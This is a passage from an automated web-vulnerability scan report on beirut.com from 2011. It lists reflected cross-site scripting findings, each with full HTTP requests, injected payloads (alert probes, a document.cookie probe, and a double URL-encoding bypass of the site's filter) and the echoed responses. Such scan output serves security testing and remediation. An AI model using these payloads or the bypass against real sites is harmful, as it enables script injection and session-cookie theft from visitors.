...[SNIP]...
<input type="hidden" name="calsearchdate" id="calsearchdate" value="today31d57"><script>alert(1)</script>01c41aa6c91">
...[SNIP]...

4.1150. http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Workshops/7278901598

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14a4b'-alert(1)-'a77bc873a07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo14a4b'-alert(1)-'a77bc873a07/Workshops/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:00:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDo14a4b'-alert(1)-'a77bc873a07/Workshops';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1151. http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Workshops/7278901598

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde96"><a>8295435d836 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDocde96"><a>8295435d836/Workshops/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:54:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDocde96"><a>8295435d836/Workshops&listingtype=events.php&Types=">
...[SNIP]...

4.1152. http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /ThingsToDo/Workshops/7278901598

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f61ed"><a>f3139efe8d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Workshopsf61ed"><a>f3139efe8d2/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:06:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=ThingsToDo/Workshopsf61ed"><a>f3139efe8d2&listingtype=events.php&Types=10">
...[SNIP]...

4.1153. http://www.beirut.com/ThingsToDo/Workshops/7278901598 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Workshops/7278901598

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6acb'-alert(1)-'0c3b23e60e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ThingsToDo/Workshopsd6acb'-alert(1)-'0c3b23e60e/7278901598 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:16:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDo/Workshopsd6acb'-alert(1)-'0c3b23e60e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1154. http://www.beirut.com/chat [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /chat

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c987"><a>d63d286407e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /chat4c987"><a>d63d286407e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:15:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_footer" rel="facebox" href="/submitaListing.php?randstyle=purple&indexpage=chat4c987"><a>d63d286407e&listingtype=chat.php&Types=">
...[SNIP]...

4.1155. http://www.beirut.com/chat [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /chat

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fad6c'-alert(1)-'923a80d881e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /chatfad6c'-alert(1)-'923a80d881e HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:25:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='chatfad6c'-alert(1)-'923a80d881e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1156. http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/css/images/closelabel.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/css/images/closelabel.gif

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1477%2527%253balert%25281%2529%252f%252fa6d5164ce23 was submitted in the REST URL parameter 5. This input was echoed as c1477';alert(1)//a6d5164ce23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/css/c1477%2527%253balert%25281%2529%252f%252fa6d5164ce23/closelabel.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:29:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='c1477';alert(1)//a6d5164ce23';
var showfacebox='';
</script>
...[SNIP]...

4.1157. http://www.beirut.com/css/blue/images/search-btn.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /css/blue/images/search-btn.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4429e%2527%253balert%25281%2529%252f%252f59f8c7185c5 was submitted in the REST URL parameter 3. This input was echoed as 4429e';alert(1)//59f8c7185c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/blue/4429e%2527%253balert%25281%2529%252f%252f59f8c7185c5/search-btn.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/widget/beirutsearchwidget.php?widgetsize=300x130
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 22:18:30 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=ec59pmbi0dmpgkk66bbc3dc396; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='4429e';alert(1)//59f8c7185c5';
var showfacebox='';
</script>
...[SNIP]...

4.1158. http://www.beirut.com/css/blue/images/search-ico.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /css/blue/images/search-ico.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6b39%2527%253balert%25281%2529%252f%252fad7443dd2e7 was submitted in the REST URL parameter 3. This input was echoed as f6b39';alert(1)//ad7443dd2e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/blue/f6b39%2527%253balert%25281%2529%252f%252fad7443dd2e7/search-ico.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/widget/beirutsearchwidget.php?widgetsize=300x130
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 22:18:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=pt385kpoqt8v89a9sf32dnfg46; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Index';
var initfacebox='';
var contactid='f6b39';alert(1)//ad7443dd2e7';
var showfacebox='';
</script>
...[SNIP]...

4.1159. http://www.beirut.com/css/purple/images/search-btn.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /css/purple/images/search-btn.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12fd8%2527%253balert%25281%2529%252f%252ff021c0b24ff was submitted in the REST URL parameter 3. This input was echoed as 12fd8';alert(1)//f021c0b24ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/12fd8%2527%253balert%25281%2529%252f%252ff021c0b24ff/search-btn.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:31:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Index';
var initfacebox='';
var contactid='12fd8';alert(1)//f021c0b24ff';
var showfacebox='';
</script>
...[SNIP]...

4.1160. http://www.beirut.com/css/purple/images/search-ico.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /css/purple/images/search-ico.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c21a0%2527%253balert%25281%2529%252f%252f6ac55102261 was submitted in the REST URL parameter 3. This input was echoed as c21a0';alert(1)//6ac55102261 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/c21a0%2527%253balert%25281%2529%252f%252f6ac55102261/search-ico.gif HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:33:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Index';
var initfacebox='';
var contactid='c21a0';alert(1)//6ac55102261';
var showfacebox='';
</script>
...[SNIP]...

4.1161. http://www.beirut.com/css/purple/images/site-bottom.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /css/purple/images/site-bottom.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfe9%2527%253balert%25281%2529%252f%252fd25ec58cd34 was submitted in the REST URL parameter 3. This input was echoed as 5dfe9';alert(1)//d25ec58cd34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/5dfe9%2527%253balert%25281%2529%252f%252fd25ec58cd34/site-bottom.png HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 02:33:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Index';
var initfacebox='';
var contactid='5dfe9';alert(1)//d25ec58cd34';
var showfacebox='';
</script>
...[SNIP]...

4.1162. http://www.beirut.com/css/purple/images/site-cnt.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /css/purple/images/site-cnt.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 310fd%2527%253balert%25281%2529%252f%252f6d9de9b9ba5 was submitted in the REST URL parameter 3. This input was echoed as 310fd';alert(1)//6d9de9b9ba5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/purple/310fd%2527%253balert%25281%2529%252f%252f6d9de9b9ba5/site-cnt.png HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.0 404 Not Found
